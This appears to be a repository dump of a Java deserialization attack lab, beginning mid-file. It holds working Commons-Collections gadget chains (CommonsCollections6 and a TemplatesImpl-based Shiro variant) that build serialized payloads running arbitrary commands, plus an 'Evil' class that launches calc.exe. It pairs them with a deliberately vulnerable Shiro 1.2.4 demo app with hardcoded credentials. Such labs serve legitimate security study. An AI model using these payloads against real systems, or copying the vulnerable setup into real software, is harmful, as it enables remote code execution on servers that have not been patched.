org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections.map.LazyMap; 9 | 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.lang.reflect.Field; 13 | import java.util.HashMap; 14 | import java.util.Map; 15 | 16 | 17 | public class CommonsCollections6 { 18 | public 
byte[] getPayload(String command) throws Exception { 19 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 20 | Transformer[] transformers = new Transformer[] { 21 | new ConstantTransformer(Runtime.class), 22 | new InvokerTransformer("getMethod", new Class[] { String.class, 23 | Class[].class }, new Object[] { "getRuntime", 24 | new Class[0] }), 25 | new InvokerTransformer("invoke", new Class[] { Object.class, 26 | Object[].class }, new Object[] { null, new Object[0] }), 27 | new InvokerTransformer("exec", new Class[] { String.class }, 28 | new String[] { command }), 29 | new ConstantTransformer(1), 30 | }; 31 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 32 | 33 | // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap 34 | Map innerMap = new HashMap(); 35 | Map outerMap = LazyMap.decorate(innerMap, transformerChain); 36 | 37 | TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); 38 | 39 | Map expMap = new HashMap(); 40 | expMap.put(tme, "valuevalue"); 41 | 42 | outerMap.remove("keykey"); 43 | 44 | Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); 45 | f.setAccessible(true); 46 | f.set(transformerChain, transformers); 47 | 48 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 49 | ObjectOutputStream oos = new ObjectOutputStream(barr); 50 | oos.writeObject(expMap); 51 | oos.close(); 52 | 53 | return barr.toByteArray(); 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.collections.Transformer; 6 | import 
org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections.map.LazyMap; 9 | 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.lang.reflect.Field; 13 | import java.util.HashMap; 14 | import java.util.Map; 15 | 16 | public class CommonsCollectionsShiro { 17 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 18 | Field field = obj.getClass().getDeclaredField(fieldName); 19 | field.setAccessible(true); 20 | field.set(obj, value); 21 | } 22 | 23 | public byte[] getPayload(byte[] clazzBytes) throws Exception { 24 | TemplatesImpl obj = new TemplatesImpl(); 25 | setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); 26 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 27 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 28 | 29 | Transformer transformer = new InvokerTransformer("getClass", null, null); 30 | 31 | Map innerMap = new HashMap(); 32 | Map outerMap = LazyMap.decorate(innerMap, transformer); 33 | 34 | TiedMapEntry tme = new TiedMapEntry(outerMap, obj); 35 | 36 | Map expMap = new HashMap(); 37 | expMap.put(tme, "valuevalue"); 38 | 39 | outerMap.clear(); 40 | setFieldValue(transformer, "iMethodName", "newTransformer"); 41 | 42 | // ================== 43 | // 生成序列化字符串 44 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 45 | ObjectOutputStream oos = new ObjectOutputStream(barr); 46 | oos.writeObject(expMap); 47 | oos.close(); 48 | 49 | return barr.toByteArray(); 50 | } 51 | } -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Evil.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import 
com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | 9 | public class Evil extends AbstractTranslet { 10 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 11 | 12 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 13 | 14 | public Evil() throws Exception { 15 | super(); 16 | System.out.println("Hello TemplatesImpl"); 17 | Runtime.getRuntime().exec("calc.exe"); 18 | } 19 | } -------------------------------------------------------------------------------- /shirodemo/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | com.govuln 8 | shirodemo 9 | 1.0-SNAPSHOT 10 | war 11 | 12 | shirodemo Maven Webapp 13 | http://www.example.com 14 | 15 | 16 | UTF-8 17 | 1.7 18 | 1.7 19 | 20 | 21 | 22 | 23 | org.apache.shiro 24 | shiro-core 25 | 1.2.4 26 | 27 | 28 | org.apache.shiro 29 | shiro-web 30 | 1.2.4 31 | 32 | 33 | 34 | javax.servlet 35 | javax.servlet-api 36 | 3.1.0 37 | provided 38 | 39 | 40 | 41 | javax.servlet.jsp 42 | jsp-api 43 | 2.2 44 | provided 45 | 46 | 47 | 48 | 49 | commons-collections 50 | commons-collections 51 | 3.2.1 52 | 53 | 54 | 55 | commons-logging 56 | commons-logging 57 | 1.2 58 | 59 | 60 | org.slf4j 61 | slf4j-api 62 | 1.7.30 63 | 64 | 65 | org.slf4j 66 | slf4j-simple 67 | 1.7.30 68 | 69 | 70 | 71 | 72 | 73 | shirodemo 74 | 75 | 76 | 77 | maven-clean-plugin 78 | 3.1.0 79 | 80 | 81 | 82 | maven-resources-plugin 83 | 3.0.2 84 | 85 | 86 | maven-compiler-plugin 87 | 3.8.0 88 | 89 | 90 | maven-surefire-plugin 91 | 2.22.1 92 | 93 | 94 | maven-war-plugin 95 | 3.2.2 96 | 97 | 98 | maven-install-plugin 99 | 2.5.2 100 | 101 | 102 | maven-deploy-plugin 103 | 
2.8.2 104 | 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /shirodemo/shirodemo.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/WEB-INF/shiro.ini: -------------------------------------------------------------------------------- 1 | [main] 2 | shiro.loginUrl = /login.jsp 3 | 4 | [users] 5 | # format: username = password, role1, role2, ..., roleN 6 | root = secret,admin 7 | guest = guest,guest 8 | 9 | [roles] 10 | # format: roleName = permission1, permission2, ..., permissionN 11 | admin = * 12 | 13 | [urls] 14 | # The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but 15 | # the 'authc' filter must still be specified for it so it can process that url's 16 | # login submissions. It is 'smart' enough to allow those requests through as specified by the 17 | # shiro.loginUrl above. 18 | /login.jsp = authc 19 | /logout = logout 20 | /** = user 21 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 8 | 9 | 10 | org.apache.shiro.web.env.EnvironmentLoaderListener 11 | 12 | 13 | 14 | ShiroFilter 15 | org.apache.shiro.web.servlet.ShiroFilter 16 | 17 | 18 | 19 | ShiroFilter 20 | /* 21 | 22 | 23 | 24 | index.jsp 25 | 26 | 27 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 2 | 3 | 4 | 5 | 6 | Congrats 7 | 8 | 9 | 10 |

Congrats


You have successfully logged in

12 | 13 | 14 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/login.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 2 | 3 | 4 | 5 | 6 | Login Page 7 | 8 | 69 | 70 | 71 | 84 | 85 | --------------------------------------------------------------------------------